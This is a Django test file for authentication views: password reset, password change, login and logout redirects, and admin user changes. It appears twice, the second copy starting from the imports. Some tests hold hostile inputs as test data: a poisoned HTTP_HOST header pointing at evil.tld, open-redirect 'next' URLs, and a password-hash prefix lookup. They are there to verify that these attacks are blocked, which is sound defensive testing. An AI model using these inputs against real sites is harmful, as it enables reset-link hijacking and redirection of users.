self.assertFalse(mail.outbox[0].message().is_multipart())
def test_html_mail_template(self):
"""
A multipart email with text/plain and text/html is sent
if the html_email_template parameter is passed to the view
"""
response = self.client.post('/password_reset/html_email_template/', {'email': 'staffmember@example.com'})
self.assertEqual(response.status_code, 302)
self.assertEqual(len(mail.outbox), 1)
message = mail.outbox[0].message()
self.assertEqual(len(message.get_payload()), 2)
self.assertTrue(message.is_multipart())
self.assertEqual(message.get_payload(0).get_content_type(), 'text/plain')
self.assertEqual(message.get_payload(1).get_content_type(), 'text/html')
self.assertTrue('<html>' not in message.get_payload(0).get_payload())
self.assertTrue('<html>' in message.get_payload(1).get_payload())
def test_email_found_custom_from(self):
"Email is sent if a valid email address is provided for password reset when a custom from_email is provided."
response = self.client.post('/password_reset_from_email/', {'email': 'staffmember@example.com'})
self.assertEqual(response.status_code, 302)
self.assertEqual(len(mail.outbox), 1)
self.assertEqual("staffmember@example.com", mail.outbox[0].from_email)
@override_settings(ALLOWED_HOSTS=['adminsite.com'])
def test_admin_reset(self):
"If the reset view is marked as being for admin, the HTTP_HOST header is used for a domain override."
response = self.client.post('/admin_password_reset/',
{'email': 'staffmember@example.com'},
HTTP_HOST='adminsite.com'
)
self.assertEqual(response.status_code, 302)
self.assertEqual(len(mail.outbox), 1)
self.assertTrue("http://adminsite.com" in mail.outbox[0].body)
self.assertEqual(settings.DEFAULT_FROM_EMAIL, mail.outbox[0].from_email)
# Skip any 500 handler action (like sending more mail...)
@override_settings(DEBUG_PROPAGATE_EXCEPTIONS=True)
def test_poisoned_http_host(self):
"Poisoned HTTP_HOST headers can't be used for reset emails"
# This attack is based on the way browsers handle URLs. The colon
# should be used to separate the port, but if the URL contains an @,
# the colon is interpreted as part of a username for login purposes,
# making 'evil.com' the request domain. Since HTTP_HOST is used to
# produce a meaningful reset URL, we need to be certain that the
# HTTP_HOST header isn't poisoned. This is done as a check when get_host()
# is invoked, but we check here as a practical consequence.
with patch_logger('django.security.DisallowedHost', 'error') as logger_calls:
response = self.client.post('/password_reset/',
{'email': 'staffmember@example.com'},
HTTP_HOST='www.example:dr.frankenstein@evil.tld'
)
self.assertEqual(response.status_code, 400)
self.assertEqual(len(mail.outbox), 0)
self.assertEqual(len(logger_calls), 1)
# Skip any 500 handler action (like sending more mail...)
@override_settings(DEBUG_PROPAGATE_EXCEPTIONS=True)
def test_poisoned_http_host_admin_site(self):
"Poisoned HTTP_HOST headers can't be used for reset emails on admin views"
with patch_logger('django.security.DisallowedHost', 'error') as logger_calls:
response = self.client.post('/admin_password_reset/',
{'email': 'staffmember@example.com'},
HTTP_HOST='www.example:dr.frankenstein@evil.tld'
)
self.assertEqual(response.status_code, 400)
self.assertEqual(len(mail.outbox), 0)
self.assertEqual(len(logger_calls), 1)
def _test_confirm_start(self):
# Start by creating the email
self.client.post('/password_reset/', {'email': 'staffmember@example.com'})
self.assertEqual(len(mail.outbox), 1)
return self._read_signup_email(mail.outbox[0])
def _read_signup_email(self, email):
urlmatch = re.search(r"https?://[^/]*(/.*reset/\S*)", email.body)
self.assertTrue(urlmatch is not None, "No URL found in sent email")
return urlmatch.group(), urlmatch.groups()[0]
def test_confirm_valid(self):
url, path = self._test_confirm_start()
response = self.client.get(path)
# redirect to a 'complete' page:
self.assertContains(response, "Please enter your new password")
def test_confirm_invalid(self):
url, path = self._test_confirm_start()
# Let's munge the token in the path, but keep the same length,
# in case the URLconf will reject a different length.
path = path[:-5] + ("0" * 4) + path[-1]
response = self.client.get(path)
self.assertContains(response, "The password reset link was invalid")
def test_confirm_invalid_user(self):
# Ensure that we get a 200 response for a non-existant user, not a 404
response = self.client.get('/reset/123456/1-1/')
self.assertContains(response, "The password reset link was invalid")
def test_confirm_overflow_user(self):
# Ensure that we get a 200 response for a base36 user id that overflows int
response = self.client.get('/reset/zzzzzzzzzzzzz/1-1/')
self.assertContains(response, "The password reset link was invalid")
def test_confirm_invalid_post(self):
# Same as test_confirm_invalid, but trying
# to do a POST instead.
url, path = self._test_confirm_start()
path = path[:-5] + ("0" * 4) + path[-1]
self.client.post(path, {
'new_password1': 'anewpassword',
'new_password2': ' anewpassword',
})
# Check the password has not been changed
u = User.objects.get(email='staffmember@example.com')
self.assertTrue(not u.check_password("anewpassword"))
def test_confirm_complete(self):
url, path = self._test_confirm_start()
response = self.client.post(path, {'new_password1': 'anewpassword',
'new_password2': 'anewpassword'})
# Check the password has been changed
u = User.objects.get(email='staffmember@example.com')
self.assertTrue(u.check_password("anewpassword"))
# Check we can't use the link again
response = self.client.get(path)
self.assertContains(response, "The password reset link was invalid")
def test_confirm_different_passwords(self):
url, path = self._test_confirm_start()
response = self.client.post(path, {'new_password1': 'anewpassword',
'new_password2': 'x'})
self.assertFormError(response, SetPasswordForm.error_messages['password_mismatch'])
def test_reset_redirect_default(self):
response = self.client.post('/password_reset/',
{'email': 'staffmember@example.com'})
self.assertEqual(response.status_code, 302)
self.assertURLEqual(response.url, '/password_reset/done/')
def test_reset_custom_redirect(self):
response = self.client.post('/password_reset/custom_redirect/',
{'email': 'staffmember@example.com'})
self.assertEqual(response.status_code, 302)
self.assertURLEqual(response.url, '/custom/')
def test_reset_custom_redirect_named(self):
response = self.client.post('/password_reset/custom_redirect/named/',
{'email': 'staffmember@example.com'})
self.assertEqual(response.status_code, 302)
self.assertURLEqual(response.url, '/password_reset/')
def test_confirm_redirect_default(self):
url, path = self._test_confirm_start()
response = self.client.post(path, {'new_password1': 'anewpassword',
'new_password2': 'anewpassword'})
self.assertEqual(response.status_code, 302)
self.assertURLEqual(response.url, '/reset/done/')
def test_confirm_redirect_custom(self):
url, path = self._test_confirm_start()
path = path.replace('/reset/', '/reset/custom/')
response = self.client.post(path, {'new_password1': 'anewpassword',
'new_password2': 'anewpassword'})
self.assertEqual(response.status_code, 302)
self.assertURLEqual(response.url, '/custom/')
def test_confirm_redirect_custom_named(self):
url, path = self._test_confirm_start()
path = path.replace('/reset/', '/reset/custom/named/')
response = self.client.post(path, {'new_password1': 'anewpassword',
'new_password2': 'anewpassword'})
self.assertEqual(response.status_code, 302)
self.assertURLEqual(response.url, '/password_reset/')
@override_settings(AUTH_USER_MODEL='auth.CustomUser')
class CustomUserPasswordResetTest(AuthViewsTestCase):
fixtures = ['custom_user.json']
def _test_confirm_start(self):
# Start by creating the email
response = self.client.post('/password_reset/', {'email': 'staffmember@example.com'})
self.assertEqual(response.status_code, 302)
self.assertEqual(len(mail.outbox), 1)
return self._read_signup_email(mail.outbox[0])
def _read_signup_email(self, email):
urlmatch = re.search(r"https?://[^/]*(/.*reset/\S*)", email.body)
self.assertTrue(urlmatch is not None, "No URL found in sent email")
return urlmatch.group(), urlmatch.groups()[0]
def test_confirm_valid_custom_user(self):
url, path = self._test_confirm_start()
response = self.client.get(path)
# redirect to a 'complete' page:
self.assertContains(response, "Please enter your new password")
@skipIfCustomUser
class ChangePasswordTest(AuthViewsTestCase):
def fail_login(self, password='password'):
response = self.client.post('/login/', {
'username': 'testclient',
'password': password,
})
self.assertFormError(response, AuthenticationForm.error_messages['invalid_login'] % {
'username': User._meta.get_field('username').verbose_name
})
def logout(self):
self.client.get('/logout/')
def test_password_change_fails_with_invalid_old_password(self):
self.login()
response = self.client.post('/password_change/', {
'old_password': 'donuts',
'new_password1': 'password1',
'new_password2': 'password1',
})
self.assertFormError(response, PasswordChangeForm.error_messages['password_incorrect'])
def test_password_change_fails_with_mismatched_passwords(self):
self.login()
response = self.client.post('/password_change/', {
'old_password': 'password',
'new_password1': 'password1',
'new_password2': 'donuts',
})
self.assertFormError(response, SetPasswordForm.error_messages['password_mismatch'])
def test_password_change_succeeds(self):
self.login()
self.client.post('/password_change/', {
'old_password': 'password',
'new_password1': 'password1',
'new_password2': 'password1',
})
self.fail_login()
self.login(password='password1')
def test_password_change_done_succeeds(self):
self.login()
response = self.client.post('/password_change/', {
'old_password': 'password',
'new_password1': 'password1',
'new_password2': 'password1',
})
self.assertEqual(response.status_code, 302)
self.assertURLEqual(response.url, '/password_change/done/')
@override_settings(LOGIN_URL='/login/')
def test_password_change_done_fails(self):
response = self.client.get('/password_change/done/')
self.assertEqual(response.status_code, 302)
self.assertURLEqual(response.url, '/login/?next=/password_change/done/')
def test_password_change_redirect_default(self):
self.login()
response = self.client.post('/password_change/', {
'old_password': 'password',
'new_password1': 'password1',
'new_password2': 'password1',
})
self.assertEqual(response.status_code, 302)
self.assertURLEqual(response.url, '/password_change/done/')
def test_password_change_redirect_custom(self):
self.login()
response = self.client.post('/password_change/custom/', {
'old_password': 'password',
'new_password1': 'password1',
'new_password2': 'password1',
})
self.assertEqual(response.status_code, 302)
self.assertURLEqual(response.url, '/custom/')
def test_password_change_redirect_custom_named(self):
self.login()
response = self.client.post('/password_change/custom/named/', {
'old_password': 'password',
'new_password1': 'password1',
'new_password2': 'password1',
})
self.assertEqual(response.status_code, 302)
self.assertURLEqual(response.url, '/password_reset/')
@skipIfCustomUser
class LoginTest(AuthViewsTestCase):
def test_current_site_in_context_after_login(self):
response = self.client.get(reverse('login'))
self.assertEqual(response.status_code, 200)
if Site._meta.installed:
site = Site.objects.get_current()
self.assertEqual(response.context['site'], site)
self.assertEqual(response.context['site_name'], site.name)
else:
self.assertIsInstance(response.context['site'], RequestSite)
self.assertTrue(isinstance(response.context['form'], AuthenticationForm),
'Login form is not an AuthenticationForm')
def test_security_check(self, password='password'):
login_url = reverse('login')
# Those URLs should not pass the security check
for bad_url in ('http://example.com',
'https://example.com',
'ftp://exampel.com',
'//example.com'):
nasty_url = '%(url)s?%(next)s=%(bad_url)s' % {
'url': login_url,
'next': REDIRECT_FIELD_NAME,
'bad_url': urlquote(bad_url),
}
response = self.client.post(nasty_url, {
'username': 'testclient',
'password': password,
})
self.assertEqual(response.status_code, 302)
self.assertFalse(bad_url in response.url,
"%s should be blocked" % bad_url)
# These URLs *should* still pass the security check
for good_url in ('/view/?param=http://example.com',
'/view/?param=https://example.com',
'/view?param=ftp://exampel.com',
'view/?param=//example.com',
'https:///',
'//testserver/',
'/url%20with%20spaces/'): # see ticket #12534
safe_url = '%(url)s?%(next)s=%(good_url)s' % {
'url': login_url,
'next': REDIRECT_FIELD_NAME,
'good_url': urlquote(good_url),
}
response = self.client.post(safe_url, {
'username': 'testclient',
'password': password,
})
self.assertEqual(response.status_code, 302)
self.assertTrue(good_url in response.url,
"%s should be allowed" % good_url)
def test_login_form_contains_request(self):
# 15198
self.client.post('/custom_requestauth_login/', {
'username': 'testclient',
'password': 'password',
}, follow=True)
# the custom authentication form used by this login asserts
# that a request is passed to the form successfully.
def test_login_csrf_rotate(self, password='password'):
"""
Makes sure that a login rotates the currently-used CSRF token.
"""
# Do a GET to establish a CSRF token
# TestClient isn't used here as we're testing middleware, essentially.
req = HttpRequest()
CsrfViewMiddleware().process_view(req, login_view, (), {})
req.META["CSRF_COOKIE_USED"] = True
resp = login_view(req)
resp2 = CsrfViewMiddleware().process_response(req, resp)
csrf_cookie = resp2.cookies.get(settings.CSRF_COOKIE_NAME, None)
token1 = csrf_cookie.coded_value
# Prepare the POST request
req = HttpRequest()
req.COOKIES[settings.CSRF_COOKIE_NAME] = token1
req.method = "POST"
req.POST = {'username': 'testclient', 'password': password, 'csrfmiddlewaretoken': token1}
req.REQUEST = req.POST
# Use POST request to log in
SessionMiddleware().process_request(req)
CsrfViewMiddleware().process_view(req, login_view, (), {})
req.META["SERVER_NAME"] = "testserver" # Required to have redirect work in login view
req.META["SERVER_PORT"] = 80
req.META["CSRF_COOKIE_USED"] = True
resp = login_view(req)
resp2 = CsrfViewMiddleware().process_response(req, resp)
csrf_cookie = resp2.cookies.get(settings.CSRF_COOKIE_NAME, None)
token2 = csrf_cookie.coded_value
# Check the CSRF token switched
self.assertNotEqual(token1, token2)
@skipIfCustomUser
class LoginURLSettings(AuthViewsTestCase):
"""Tests for settings.LOGIN_URL."""
def assertLoginURLEquals(self, url, parse_qs=False):
response = self.client.get('/login_required/')
self.assertEqual(response.status_code, 302)
self.assertURLEqual(response.url, url, parse_qs=parse_qs)
@override_settings(LOGIN_URL='/login/')
def test_standard_login_url(self):
self.assertLoginURLEquals('/login/?next=/login_required/')
@override_settings(LOGIN_URL='login')
def test_named_login_url(self):
self.assertLoginURLEquals('/login/?next=/login_required/')
@override_settings(LOGIN_URL='http://remote.example.com/login')
def test_remote_login_url(self):
quoted_next = urlquote('http://testserver/login_required/')
expected = 'http://remote.example.com/login?next=%s' % quoted_next
self.assertLoginURLEquals(expected)
@override_settings(LOGIN_URL='https:///login/')
def test_https_login_url(self):
quoted_next = urlquote('http://testserver/login_required/')
expected = 'https:///login/?next=%s' % quoted_next
self.assertLoginURLEquals(expected)
@override_settings(LOGIN_URL='/login/?pretty=1')
def test_login_url_with_querystring(self):
self.assertLoginURLEquals('/login/?pretty=1&next=/login_required/', parse_qs=True)
@override_settings(LOGIN_URL='http://remote.example.com/login/?next=/default/')
def test_remote_login_url_with_next_querystring(self):
quoted_next = urlquote('http://testserver/login_required/')
expected = 'http://remote.example.com/login/?next=%s' % quoted_next
self.assertLoginURLEquals(expected)
@skipIfCustomUser
class LoginRedirectUrlTest(AuthViewsTestCase):
"""Tests for settings.LOGIN_REDIRECT_URL."""
def assertLoginRedirectURLEqual(self, url):
response = self.login()
self.assertEqual(response.status_code, 302)
self.assertURLEqual(response.url, url)
def test_default(self):
self.assertLoginRedirectURLEqual('/accounts/profile/')
@override_settings(LOGIN_REDIRECT_URL='/custom/')
def test_custom(self):
self.assertLoginRedirectURLEqual('/custom/')
@override_settings(LOGIN_REDIRECT_URL='password_reset')
def test_named(self):
self.assertLoginRedirectURLEqual('/password_reset/')
@override_settings(LOGIN_REDIRECT_URL='http://remote.example.com/welcome/')
def test_remote(self):
self.assertLoginRedirectURLEqual('http://remote.example.com/welcome/')
@skipIfCustomUser
class LogoutTest(AuthViewsTestCase):
def confirm_logged_out(self):
self.assertTrue(SESSION_KEY not in self.client.session)
def test_logout_default(self):
"Logout without next_page option renders the default template"
self.login()
response = self.client.get('/logout/')
self.assertContains(response, 'Logged out')
self.confirm_logged_out()
def test_14377(self):
# Bug 14377
self.login()
response = self.client.get('/logout/')
self.assertTrue('site' in response.context)
def test_logout_with_overridden_redirect_url(self):
# Bug 11223
self.login()
response = self.client.get('/logout/next_page/')
self.assertEqual(response.status_code, 302)
self.assertURLEqual(response.url, '/somewhere/')
response = self.client.get('/logout/next_page/?next=/login/')
self.assertEqual(response.status_code, 302)
self.assertURLEqual(response.url, '/login/')
self.confirm_logged_out()
def test_logout_with_next_page_specified(self):
"Logout with next_page option given redirects to specified resource"
self.login()
response = self.client.get('/logout/next_page/')
self.assertEqual(response.status_code, 302)
self.assertURLEqual(response.url, '/somewhere/')
self.confirm_logged_out()
def test_logout_with_redirect_argument(self):
"Logout with query string redirects to specified resource"
self.login()
response = self.client.get('/logout/?next=/login/')
self.assertEqual(response.status_code, 302)
self.assertURLEqual(response.url, '/login/')
self.confirm_logged_out()
def test_logout_with_custom_redirect_argument(self):
"Logout with custom query string redirects to specified resource"
self.login()
response = self.client.get('/logout/custom_query/?follow=/somewhere/')
self.assertEqual(response.status_code, 302)
self.assertURLEqual(response.url, '/somewhere/')
self.confirm_logged_out()
def test_logout_with_named_redirect(self):
"Logout resolves names or URLs passed as next_page."
self.login()
response = self.client.get('/logout/next_page/named/')
self.assertEqual(response.status_code, 302)
self.assertURLEqual(response.url, '/password_reset/')
self.confirm_logged_out()
def test_security_check(self, password='password'):
logout_url = reverse('logout')
# Those URLs should not pass the security check
for bad_url in ('http://example.com',
'https://example.com',
'ftp://exampel.com',
'//example.com'):
nasty_url = '%(url)s?%(next)s=%(bad_url)s' % {
'url': logout_url,
'next': REDIRECT_FIELD_NAME,
'bad_url': urlquote(bad_url),
}
self.login()
response = self.client.get(nasty_url)
self.assertEqual(response.status_code, 302)
self.assertFalse(bad_url in response.url,
"%s should be blocked" % bad_url)
self.confirm_logged_out()
# These URLs *should* still pass the security check
for good_url in ('/view/?param=http://example.com',
'/view/?param=https://example.com',
'/view?param=ftp://exampel.com',
'view/?param=//example.com',
'https:///',
'//testserver/',
'/url%20with%20spaces/'): # see ticket #12534
safe_url = '%(url)s?%(next)s=%(good_url)s' % {
'url': logout_url,
'next': REDIRECT_FIELD_NAME,
'good_url': urlquote(good_url),
}
self.login()
response = self.client.get(safe_url)
self.assertEqual(response.status_code, 302)
self.assertTrue(good_url in response.url,
"%s should be allowed" % good_url)
self.confirm_logged_out()
@skipIfCustomUser
@override_settings(
PASSWORD_HASHERS=('django.contrib.auth.hashers.SHA1PasswordHasher',),
)
class ChangelistTests(AuthViewsTestCase):
urls = 'django.contrib.auth.tests.urls_admin'
def setUp(self):
# Make me a superuser before logging in.
User.objects.filter(username='testclient').update(is_staff=True, is_superuser=True)
self.login()
self.admin = User.objects.get(pk=1)
def get_user_data(self, user):
return {
'username': user.username,
'password': user.password,
'email': user.email,
'is_active': user.is_active,
'is_staff': user.is_staff,
'is_superuser': user.is_superuser,
'last_login_0': user.last_login.strftime('%Y-%m-%d'),
'last_login_1': user.last_login.strftime('%H:%M:%S'),
'initial-last_login_0': user.last_login.strftime('%Y-%m-%d'),
'initial-last_login_1': user.last_login.strftime('%H:%M:%S'),
'date_joined_0': user.date_joined.strftime('%Y-%m-%d'),
'date_joined_1': user.date_joined.strftime('%H:%M:%S'),
'initial-date_joined_0': user.date_joined.strftime('%Y-%m-%d'),
'initial-date_joined_1': user.date_joined.strftime('%H:%M:%S'),
'first_name': user.first_name,
'last_name': user.last_name,
}
# #20078 - users shouldn't be allowed to guess password hashes via
# repeated password__startswith queries.
def test_changelist_disallows_password_lookups(self):
# A lookup that tries to filter on password isn't OK
with patch_logger('django.security.DisallowedModelAdminLookup', 'error') as logger_calls:
response = self.client.get('/admin/auth/user/?password__startswith=sha1$')
self.assertEqual(response.status_code, 400)
self.assertEqual(len(logger_calls), 1)
def test_user_change_email(self):
data = self.get_user_data(self.admin)
data['email'] = 'new_' + data['email']
response = self.client.post('/admin/auth/user/%s/' % self.admin.pk, data)
self.assertRedirects(response, '/admin/auth/user/')
row = LogEntry.objects.latest('id')
self.assertEqual(row.change_message, 'Changed email.')
def test_user_not_change(self):
response = self.client.post('/admin/auth/user/%s/' % self.admin.pk,
self.get_user_data(self.admin)
)
self.assertRedirects(response, '/admin/auth/user/')
row = LogEntry.objects.latest('id')
self.assertEqual(row.change_message, 'No fields changed.')
def test_user_change_password(self):
response = self.client.post('/admin/auth/user/%s/password/' % self.admin.pk, {
'password1': 'password1',
'password2': 'password1',
})
self.assertRedirects(response, '/admin/auth/user/%s/' % self.admin.pk)
row = LogEntry.objects.latest('id')
self.assertEqual(row.change_message, 'Changed password.')
self.logout()
self.login(password='password1')
| import itertools
import os
import re
try:
from urllib.parse import urlparse, ParseResult
except ImportError: # Python 2
from urlparse import urlparse, ParseResult
from django.conf import global_settings, settings
from django.contrib.sites.models import Site, RequestSite
from django.contrib.admin.models import LogEntry
from django.contrib.auth.models import User
from django.core import mail
from django.core.urlresolvers import reverse, NoReverseMatch
from django.http import QueryDict, HttpRequest
from django.utils.encoding import force_text
from django.utils.http import urlquote
from django.utils._os import upath
from django.test import TestCase
from django.test.utils import override_settings, patch_logger
from django.middleware.csrf import CsrfViewMiddleware
from django.contrib.sessions.middleware import SessionMiddleware
from django.contrib.auth import SESSION_KEY, REDIRECT_FIELD_NAME
from django.contrib.auth.forms import (AuthenticationForm, PasswordChangeForm,
SetPasswordForm)
from django.contrib.auth.tests.utils import skipIfCustomUser
from django.contrib.auth.views import login as login_view
@override_settings(
LANGUAGES=(
('en', 'English'),
),
LANGUAGE_CODE='en',
TEMPLATE_LOADERS=global_settings.TEMPLATE_LOADERS,
TEMPLATE_DIRS=(
os.path.join(os.path.dirname(upath(__file__)), 'templates'),
),
USE_TZ=False,
PASSWORD_HASHERS=('django.contrib.auth.hashers.SHA1PasswordHasher',),
)
class AuthViewsTestCase(TestCase):
"""
Helper base class for all the follow test cases.
"""
fixtures = ['authtestdata.json']
urls = 'django.contrib.auth.tests.urls'
def login(self, password='password'):
response = self.client.post('/login/', {
'username': 'testclient',
'password': password,
})
self.assertTrue(SESSION_KEY in self.client.session)
return response
def logout(self):
response = self.client.get('/admin/logout/')
self.assertEqual(response.status_code, 200)
self.assertTrue(SESSION_KEY not in self.client.session)
def assertFormError(self, response, error):
"""Assert that error is found in response.context['form'] errors"""
form_errors = list(itertools.chain(*response.context['form'].errors.values()))
self.assertIn(force_text(error), form_errors)
def assertURLEqual(self, url, expected, parse_qs=False):
"""
Given two URLs, make sure all their components (the ones given by
urlparse) are equal, only comparing components that are present in both
URLs.
If `parse_qs` is True, then the querystrings are parsed with QueryDict.
This is useful if you don't want the order of parameters to matter.
Otherwise, the query strings are compared as-is.
"""
fields = ParseResult._fields
for attr, x, y in zip(fields, urlparse(url), urlparse(expected)):
if parse_qs and attr == 'query':
x, y = QueryDict(x), QueryDict(y)
if x and y and x != y:
self.fail("%r != %r (%s doesn't match)" % (url, expected, attr))
@skipIfCustomUser
class AuthViewNamedURLTests(AuthViewsTestCase):
urls = 'django.contrib.auth.urls'
def test_named_urls(self):
"Named URLs should be reversible"
expected_named_urls = [
('login', [], {}),
('logout', [], {}),
('password_change', [], {}),
('password_change_done', [], {}),
('password_reset', [], {}),
('password_reset_done', [], {}),
('password_reset_confirm', [], {
'uidb64': 'aaaaaaa',
'token': '1111-aaaaa',
}),
('password_reset_complete', [], {}),
]
for name, args, kwargs in expected_named_urls:
try:
reverse(name, args=args, kwargs=kwargs)
except NoReverseMatch:
self.fail("Reversal of url named '%s' failed with NoReverseMatch" % name)
@skipIfCustomUser
class PasswordResetTest(AuthViewsTestCase):
def test_email_not_found(self):
"""If the provided email is not registered, don't raise any error but
also don't send any email."""
response = self.client.get('/password_reset/')
self.assertEqual(response.status_code, 200)
response = self.client.post('/password_reset/', {'email': 'not_a_real_email@email.com'})
self.assertEqual(response.status_code, 302)
self.assertEqual(len(mail.outbox), 0)
def test_email_found(self):
"Email is sent if a valid email address is provided for password reset"
response = self.client.post('/password_reset/', {'email': 'staffmember@example.com'})
self.assertEqual(response.status_code, 302)
self.assertEqual(len(mail.outbox), 1)
self.assertTrue("http://" in mail.outbox[0].body)
self.assertEqual(settings.DEFAULT_FROM_EMAIL, mail.outbox[0].from_email)
# optional multipart text/html email has been added. Make sure original,
# default functionality is 100% the same
self.assertFalse(mail.outbox[0].message().is_multipart())
def test_html_mail_template(self):
"""
A multipart email with text/plain and text/html is sent
if the html_email_template parameter is passed to the view
"""
response = self.client.post('/password_reset/html_email_template/', {'email': 'staffmember@example.com'})
self.assertEqual(response.status_code, 302)
self.assertEqual(len(mail.outbox), 1)
message = mail.outbox[0].message()
self.assertEqual(len(message.get_payload()), 2)
self.assertTrue(message.is_multipart())
self.assertEqual(message.get_payload(0).get_content_type(), 'text/plain')
self.assertEqual(message.get_payload(1).get_content_type(), 'text/html')
self.assertTrue('<html>' not in message.get_payload(0).get_payload())
self.assertTrue('<html>' in message.get_payload(1).get_payload())
def test_email_found_custom_from(self):
"Email is sent if a valid email address is provided for password reset when a custom from_email is provided."
response = self.client.post('/password_reset_from_email/', {'email': 'staffmember@example.com'})
self.assertEqual(response.status_code, 302)
self.assertEqual(len(mail.outbox), 1)
self.assertEqual("staffmember@example.com", mail.outbox[0].from_email)
@override_settings(ALLOWED_HOSTS=['adminsite.com'])
def test_admin_reset(self):
"If the reset view is marked as being for admin, the HTTP_HOST header is used for a domain override."
response = self.client.post('/admin_password_reset/',
{'email': 'staffmember@example.com'},
HTTP_HOST='adminsite.com'
)
self.assertEqual(response.status_code, 302)
self.assertEqual(len(mail.outbox), 1)
self.assertTrue("http://adminsite.com" in mail.outbox[0].body)
self.assertEqual(settings.DEFAULT_FROM_EMAIL, mail.outbox[0].from_email)
# Skip any 500 handler action (like sending more mail...)
@override_settings(DEBUG_PROPAGATE_EXCEPTIONS=True)
def test_poisoned_http_host(self):
"Poisoned HTTP_HOST headers can't be used for reset emails"
# This attack is based on the way browsers handle URLs. The colon
# should be used to separate the port, but if the URL contains an @,
# the colon is interpreted as part of a username for login purposes,
# making 'evil.com' the request domain. Since HTTP_HOST is used to
# produce a meaningful reset URL, we need to be certain that the
# HTTP_HOST header isn't poisoned. This is done as a check when get_host()
# is invoked, but we check here as a practical consequence.
with patch_logger('django.security.DisallowedHost', 'error') as logger_calls:
response = self.client.post('/password_reset/',
{'email': 'staffmember@example.com'},
HTTP_HOST='www.example:dr.frankenstein@evil.tld'
)
self.assertEqual(response.status_code, 400)
self.assertEqual(len(mail.outbox), 0)
self.assertEqual(len(logger_calls), 1)
# Skip any 500 handler action (like sending more mail...)
@override_settings(DEBUG_PROPAGATE_EXCEPTIONS=True)
def test_poisoned_http_host_admin_site(self):
"Poisoned HTTP_HOST headers can't be used for reset emails on admin views"
with patch_logger('django.security.DisallowedHost', 'error') as logger_calls:
response = self.client.post('/admin_password_reset/',
{'email': 'staffmember@example.com'},
HTTP_HOST='www.example:dr.frankenstein@evil.tld'
)
self.assertEqual(response.status_code, 400)
self.assertEqual(len(mail.outbox), 0)
self.assertEqual(len(logger_calls), 1)
def _test_confirm_start(self):
# Start by creating the email
self.client.post('/password_reset/', {'email': 'staffmember@example.com'})
self.assertEqual(len(mail.outbox), 1)
return self._read_signup_email(mail.outbox[0])
def _read_signup_email(self, email):
urlmatch = re.search(r"https?://[^/]*(/.*reset/\S*)", email.body)
self.assertTrue(urlmatch is not None, "No URL found in sent email")
return urlmatch.group(), urlmatch.groups()[0]
def test_confirm_valid(self):
url, path = self._test_confirm_start()
response = self.client.get(path)
# redirect to a 'complete' page:
self.assertContains(response, "Please enter your new password")
def test_confirm_invalid(self):
url, path = self._test_confirm_start()
# Let's munge the token in the path, but keep the same length,
# in case the URLconf will reject a different length.
path = path[:-5] + ("0" * 4) + path[-1]
response = self.client.get(path)
self.assertContains(response, "The password reset link was invalid")
def test_confirm_invalid_user(self):
# Ensure that we get a 200 response for a non-existant user, not a 404
response = self.client.get('/reset/123456/1-1/')
self.assertContains(response, "The password reset link was invalid")
def test_confirm_overflow_user(self):
# Ensure that we get a 200 response for a base36 user id that overflows int
response = self.client.get('/reset/zzzzzzzzzzzzz/1-1/')
self.assertContains(response, "The password reset link was invalid")
def test_confirm_invalid_post(self):
# Same as test_confirm_invalid, but trying
# to do a POST instead.
url, path = self._test_confirm_start()
path = path[:-5] + ("0" * 4) + path[-1]
self.client.post(path, {
'new_password1': 'anewpassword',
'new_password2': ' anewpassword',
})
# Check the password has not been changed
u = User.objects.get(email='staffmember@example.com')
self.assertTrue(not u.check_password("anewpassword"))
def test_confirm_complete(self):
url, path = self._test_confirm_start()
response = self.client.post(path, {'new_password1': 'anewpassword',
'new_password2': 'anewpassword'})
# Check the password has been changed
u = User.objects.get(email='staffmember@example.com')
self.assertTrue(u.check_password("anewpassword"))
# Check we can't use the link again
response = self.client.get(path)
self.assertContains(response, "The password reset link was invalid")
def test_confirm_different_passwords(self):
url, path = self._test_confirm_start()
response = self.client.post(path, {'new_password1': 'anewpassword',
'new_password2': 'x'})
self.assertFormError(response, SetPasswordForm.error_messages['password_mismatch'])
def test_reset_redirect_default(self):
response = self.client.post('/password_reset/',
{'email': 'staffmember@example.com'})
self.assertEqual(response.status_code, 302)
self.assertURLEqual(response.url, '/password_reset/done/')
def test_reset_custom_redirect(self):
response = self.client.post('/password_reset/custom_redirect/',
{'email': 'staffmember@example.com'})
self.assertEqual(response.status_code, 302)
self.assertURLEqual(response.url, '/custom/')
def test_reset_custom_redirect_named(self):
response = self.client.post('/password_reset/custom_redirect/named/',
{'email': 'staffmember@example.com'})
self.assertEqual(response.status_code, 302)
self.assertURLEqual(response.url, '/password_reset/')
def test_confirm_redirect_default(self):
url, path = self._test_confirm_start()
response = self.client.post(path, {'new_password1': 'anewpassword',
'new_password2': 'anewpassword'})
self.assertEqual(response.status_code, 302)
self.assertURLEqual(response.url, '/reset/done/')
def test_confirm_redirect_custom(self):
url, path = self._test_confirm_start()
path = path.replace('/reset/', '/reset/custom/')
response = self.client.post(path, {'new_password1': 'anewpassword',
'new_password2': 'anewpassword'})
self.assertEqual(response.status_code, 302)
self.assertURLEqual(response.url, '/custom/')
def test_confirm_redirect_custom_named(self):
url, path = self._test_confirm_start()
path = path.replace('/reset/', '/reset/custom/named/')
response = self.client.post(path, {'new_password1': 'anewpassword',
'new_password2': 'anewpassword'})
self.assertEqual(response.status_code, 302)
self.assertURLEqual(response.url, '/password_reset/')
@override_settings(AUTH_USER_MODEL='auth.CustomUser')
class CustomUserPasswordResetTest(AuthViewsTestCase):
fixtures = ['custom_user.json']
def _test_confirm_start(self):
# Start by creating the email
response = self.client.post('/password_reset/', {'email': 'staffmember@example.com'})
self.assertEqual(response.status_code, 302)
self.assertEqual(len(mail.outbox), 1)
return self._read_signup_email(mail.outbox[0])
def _read_signup_email(self, email):
urlmatch = re.search(r"https?://[^/]*(/.*reset/\S*)", email.body)
self.assertTrue(urlmatch is not None, "No URL found in sent email")
return urlmatch.group(), urlmatch.groups()[0]
def test_confirm_valid_custom_user(self):
url, path = self._test_confirm_start()
response = self.client.get(path)
# redirect to a 'complete' page:
self.assertContains(response, "Please enter your new password")
@skipIfCustomUser
class ChangePasswordTest(AuthViewsTestCase):
def fail_login(self, password='password'):
response = self.client.post('/login/', {
'username': 'testclient',
'password': password,
})
self.assertFormError(response, AuthenticationForm.error_messages['invalid_login'] % {
'username': User._meta.get_field('username').verbose_name
})
def logout(self):
self.client.get('/logout/')
def test_password_change_fails_with_invalid_old_password(self):
self.login()
response = self.client.post('/password_change/', {
'old_password': 'donuts',
'new_password1': 'password1',
'new_password2': 'password1',
})
